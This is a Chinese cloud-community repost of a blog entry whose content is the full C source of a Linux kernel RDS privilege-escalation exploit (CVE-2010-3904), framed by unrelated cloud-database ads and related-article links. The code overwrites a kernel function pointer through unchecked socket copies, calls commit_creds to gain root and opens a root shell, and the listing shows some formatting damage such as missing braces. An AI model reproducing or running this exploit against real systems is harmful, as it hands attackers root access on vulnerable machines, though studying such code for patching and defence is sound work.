Linux RDS Protocol Local Privilege Escalation

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介:

 http://www.vsecurity.com/download/tools/linux-rds-exploit.c

 

 
  1. /* 
  2.  * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit 
  3.  * CVE-2010-3904 
  4.  * by Dan Rosenberg <drosenberg@vsecurity.com> 
  5.  * 
  6.  * Copyright 2010 Virtual Security Research, LLC 
  7.  * 
  8.  * The handling functions for sending and receiving RDS messages 
  9.  * use unchecked __copy_*_user_inatomic functions without any 
  10.  * access checks on user-provided pointers.  As a result, by 
  11.  * passing a kernel address as an iovec base address in recvmsg-style 
  12.  * calls, a local user can overwrite arbitrary kernel memory, which 
  13.  * can easily be used to escalate privileges to root.  Alternatively, 
  14.  * an arbitrary kernel read can be performed via sendmsg calls. 
  15.  * 
  16.  * This exploit is simple - it resolves a few kernel symbols, 
  17.  * and overwrites a function pointer (rds_ioctl) to point 
  18.  * to the payload.  After triggering the payload, the original 
  19.  * value is restored.  Hard-coding the offset of this function 
  20.  * pointer is a bit inelegant, but I wanted to keep it simple and 
  21.  * architecture-independent (i.e. no inline assembly). 
  22.  * 
  23.  * The vulnerability is yet another example of why you shouldn't 
  24.  * allow loading of random packet families unless you actually 
  25.  * need them. 
  26.  * 
  27.  * Greets to spender, kees, taviso, hawkes, team lollerskaters, 
  28.  * joberheide, bla, sts, and VSR 
  29.  * 
  30.  */ 
  31.   
  32. #include <stdio.h> 
  33. #include <unistd.h> 
  34. #include <stdlib.h> 
  35. #include <fcntl.h> 
  36. #include <sys/types.h> 
  37. #include <sys/socket.h> 
  38. #include <netinet/in.h> 
  39. #include <errno.h> 
  40. #include <string.h> 
  41. #include <sys/utsname.h> 
  42.   
  43. #define RECVPORT 5555 
  44. #define SENDPORT 6666 
  45.   
  46. int prep_sock(int port) 
  47.   
  48.     int s, ret; 
  49.     struct sockaddr_in addr; 
  50.   
  51.     s = socket(PF_RDS, SOCK_SEQPACKET, 0); 
  52.   
  53.     if(s < 0) { 
  54.         printf("[*] Could not open socket.\n"); 
  55.         exit(-1); 
  56.     } 
  57.   
  58.     memset(&addr, 0, sizeof(addr)); 
  59.   
  60.     addr.sin_addr.s_addr = inet_addr("127.0.0.1"); 
  61.     addr.sin_family = AF_INET; 
  62.     addr.sin_port = htons(port); 
  63.   
  64.     ret = bind(s, (struct sockaddr *)&addr, sizeof(addr)); 
  65.   
  66.     if(ret < 0) { 
  67.         printf("[*] Could not bind socket.\n"); 
  68.         exit(-1); 
  69.     } 
  70.   
  71.     return s; 
  72.   
  73.   
  74. void get_message(unsigned long address, int sock) 
  75.   
  76.     recvfrom(sock, (void *)address, sizeof(void *), 0, 
  77.          NULL, NULL); 
  78.   
  79.   
  80. void send_message(unsigned long value, int sock) 
  81.   
  82.     int size, ret; 
  83.     struct sockaddr_in recvaddr; 
  84.     struct msghdr msg; 
  85.     struct iovec iov; 
  86.     unsigned long buf; 
  87.   
  88.     memset(&recvaddr, 0, sizeof(recvaddr)); 
  89.   
  90.     size = sizeof(recvaddr); 
  91.   
  92.     recvaddr.sin_port = htons(RECVPORT); 
  93.     recvaddr.sin_family = AF_INET; 
  94.     recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); 
  95.   
  96.     memset(&msg, 0, sizeof(msg)); 
  97.   
  98.     msg.msg_name = &recvaddr; 
  99.     msg.msg_namelen = sizeof(recvaddr); 
  100.     msg.msg_iovlen = 1; 
  101.   
  102.     buf = value; 
  103.   
  104.     iov.iov_len = sizeof(buf); 
  105.     iov.iov_base = &buf; 
  106.   
  107.     msg.msg_iov = &iov; 
  108.   
  109.     ret = sendmsg(sock, &msg, 0); 
  110.     if(ret < 0) { 
  111.         printf("[*] Something went wrong sending.\n"); 
  112.         exit(-1); 
  113.     } 
  114.   
  115. void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock) 
  116.   
  117.     if(!fork()) { 
  118.             sleep(1); 
  119.             send_message(value, sendsock); 
  120.             exit(1); 
  121.     } 
  122.     else { 
  123.         get_message(addr, recvsock); 
  124.         wait(NULL); 
  125.     } 
  126.   
  127.   
  128. typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); 
  129. typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); 
  130. _commit_creds commit_creds; 
  131. _prepare_kernel_cred prepare_kernel_cred; 
  132.   
  133. int __attribute__((regparm(3))) 
  134. getroot(void * file, void * vma) 
  135.   
  136.     commit_creds(prepare_kernel_cred(0)); 
  137.     return -1;  
  138.   
  139.   
  140. /* thanks spender... */ 
  141. unsigned long get_kernel_sym(char *name) 
  142.     FILE *f; 
  143.     unsigned long addr; 
  144.     char dummy; 
  145.     char sname[512]; 
  146.     struct utsname ver; 
  147.     int ret; 
  148.     int rep = 0; 
  149.     int oldstyle = 0; 
  150.   
  151.     f = fopen("/proc/kallsyms""r"); 
  152.     if (f == NULL) { 
  153.         f = fopen("/proc/ksyms""r"); 
  154.         if (f == NULL) 
  155.             goto fallback; 
  156.         oldstyle = 1; 
  157.     } 
  158.   
  159. repeat: 
  160.     ret = 0; 
  161.     while(ret != EOF) { 
  162.         if (!oldstyle) 
  163.             ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); 
  164.         else { 
  165.             ret = fscanf(f, "%p %s\n", (void **)&addr, sname); 
  166.             if (ret == 2) { 
  167.                 char *p; 
  168.                 if (strstr(sname, "_O/") || strstr(sname, "_S.")) 
  169.                     continue
  170.                 p = strrchr(sname, '_'); 
  171.                 if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { 
  172.                     p = p - 4; 
  173.                     while (p > (char *)sname && *(p - 1) == '_'
  174.                         p--; 
  175.                     *p = '\0'
  176.                 } 
  177.             } 
  178.         } 
  179.         if (ret == 0) { 
  180.             fscanf(f, "%s\n", sname); 
  181.             continue
  182.         } 
  183.         if (!strcmp(name, sname)) { 
  184.             fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : ""); 
  185.             fclose(f); 
  186.             return addr; 
  187.         } 
  188.     } 
  189.   
  190.     fclose(f); 
  191.     if (rep) 
  192.         return 0; 
  193. fallback: 
  194.     /* didn't find the symbol, let's retry with the System.map 
  195.        dedicated to the pointlessness of Russell Coker's SELinux 
  196.        test machine (why does he keep upgrading the kernel if 
  197.        "all necessary security can be provided by SE Linux"?) 
  198.     */ 
  199.     uname(&ver); 
  200.     if (strncmp(ver.release, "2.6", 3)) 
  201.         oldstyle = 1; 
  202.     sprintf(sname, "/boot/System.map-%s", ver.release); 
  203.     f = fopen(sname, "r"); 
  204.     if (f == NULL) 
  205.         return 0; 
  206.     rep = 1; 
  207.     goto repeat; 
  208.   
  209. int main(int argc, char * argv[]) 
  210.     unsigned long sock_ops, rds_ioctl, target; 
  211.     int sendsock, recvsock; 
  212.     struct utsname ver; 
  213.   
  214.     printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n"); 
  215.     printf("[*] by Dan Rosenberg\n"); 
  216.   
  217.     uname(&ver); 
  218.   
  219.     if(strncmp(ver.release, "2.6.3", 5)) { 
  220.         printf("[*] Your kernel is not vulnerable.\n"); 
  221.         return -1; 
  222.     }   
  223.   
  224.     sendsock = prep_sock(SENDPORT); 
  225.     recvsock = prep_sock(RECVPORT); 
  226.   
  227.     /* Resolve addresses of relevant symbols */ 
  228.     printf("[*] Resolving kernel addresses...\n"); 
  229.     sock_ops = get_kernel_sym("rds_proto_ops"); 
  230.     rds_ioctl = get_kernel_sym("rds_ioctl"); 
  231.     commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); 
  232.     prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred"); 
  233.   
  234.     if(!sock_ops || !rds_ioctl || !commit_creds || !prepare_kernel_cred) { 
  235.         printf("[*] Failed to resolve kernel symbols.\n"); 
  236.         return -1; 
  237.     } 
  238.   
  239.     /* Calculate target */ 
  240.     target = sock_ops + 9 * sizeof(void *); 
  241.   
  242.     /* Overwrite rds_ioctl function pointer */ 
  243.     printf("[*] Overwriting function pointer...\n"); 
  244.     write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock); 
  245.   
  246.     /* Trigger the payload */ 
  247.     printf("[*] Triggering payload...\n"); 
  248.     ioctl(sendsock, 0, NULL); 
  249.   
  250.     /* Restore the rds_ioctl function pointer */ 
  251.     printf("[*] Restoring function pointer...\n"); 
  252.     write_to_mem(target, rds_ioctl, sendsock, recvsock); 
  253.   
  254.     if(getuid()) { 
  255.         printf("[*] Exploit failed to get root.\n"); 
  256.         return -1; 
  257.     } 
  258.   
  259.     printf("[*] Got root!\n"); 
  260.     execl("/bin/sh""sh", NULL); 
  261.   

 








本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/538385,如需转载请自行联系原作者

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
相关文章
|
1月前
|
安全 关系型数据库 MySQL
Linux下安装mysql8.0(以tar.xz包安装--编译安装)
通过上述步骤,您完成了从下载、编译、安装到配置MySQL 8.0的全过程。此过程虽然较为复杂,但提供了对MySQL安装环境的完全控制,有助于满足特定的部署需求。在实际操作中,根据具体的系统环境,可能还需调整部分步骤或解决未预见的依赖问题。始终参考官方文档和社区资源,保持安装过程与最新版本的兼容性。
539 67
|
10天前
|
关系型数据库 MySQL Linux
Linux系统如何设置自启动服务在MySQL数据库启动后执行?
【10月更文挑战第25天】Linux系统如何设置自启动服务在MySQL数据库启动后执行?
58 3
|
24天前
|
Ubuntu 关系型数据库 MySQL
Linux系统MySQL安装
【10月更文挑战第19天】本文介绍了在 Linux 系统上安装 MySQL 的步骤,包括安装前准备、安装 MySQL、启动 MySQL 服务、配置 MySQL 以及验证安装。适用于 Ubuntu/Debian 和 CentOS/Fedora 系统,提供了详细的命令示例。
124 1
|
2月前
|
关系型数据库 MySQL Linux
Linux 安装 mysql 【使用 tar.gz | tar.xz安装包-离线安装】
在Linux系统中使用tar.xz压缩包安装MySQL数据库的详细步骤。包括下载MySQL压缩包,解压到指定目录,创建mysql用户和组,设置目录权限,初始化MySQL,配置my.cnf文件,启动服务,以及修改root用户密码。此外,还提供了如何设置Windows远程登录MySQL服务器的方法。
Linux 安装 mysql 【使用 tar.gz | tar.xz安装包-离线安装】
|
1月前
|
关系型数据库 MySQL Linux
Linux系统绿色安装MySQL 8.0.39
Linux系统绿色安装MySQL 8.0.39
|
2月前
|
NoSQL 关系型数据库 Redis
mall在linux环境下的部署(基于Docker容器),Docker安装mysql、redis、nginx、rabbitmq、elasticsearch、logstash、kibana、mongo
mall在linux环境下的部署(基于Docker容器),docker安装mysql、redis、nginx、rabbitmq、elasticsearch、logstash、kibana、mongodb、minio详细教程,拉取镜像、运行容器
mall在linux环境下的部署(基于Docker容器),Docker安装mysql、redis、nginx、rabbitmq、elasticsearch、logstash、kibana、mongo
|
2月前
|
关系型数据库 MySQL Linux
Linux 安装 mysql【使用yum源进行安装】
这篇文章介绍了在Linux系统中使用yum源安装MySQL数据库的步骤,包括配置yum源、安装MySQL服务、启动服务以及修改root用户的默认密码。
Linux 安装 mysql【使用yum源进行安装】
|
2月前
|
Oracle Java 关系型数据库
Linux下JDK环境的配置及 bash: /usr/local/java/bin/java: cannot execute binary file: exec format error问题的解决
如果遇到"exec format error"问题,文章建议先检查Linux操作系统是32位还是64位,并确保安装了与系统匹配的JDK版本。如果系统是64位的,但出现了错误,可能是因为下载了错误的JDK版本。文章提供了一个链接,指向Oracle官网上的JDK 17 Linux版本下载页面,并附有截图说明。
Linux下JDK环境的配置及 bash: /usr/local/java/bin/java: cannot execute binary file: exec format error问题的解决
|
29天前
|
关系型数据库 MySQL Linux
Navicat 连接 Windows、Linux系统下的MySQL 各种错误,修改密码。
使用Navicat连接Windows和Linux系统下的MySQL时可能遇到的四种错误及其解决方法,包括错误代码2003、1045和2013,以及如何修改MySQL密码。
176 0
|
2月前
|
关系型数据库 MySQL 数据库
docker启动mysql多实例连接报错Can’t connect to local MySQL server through socket ‘/var/run/mysqld/mysqld.sock’
docker启动mysql多实例连接报错Can’t connect to local MySQL server through socket ‘/var/run/mysqld/mysqld.sock’
168 0
下一篇
无影云桌面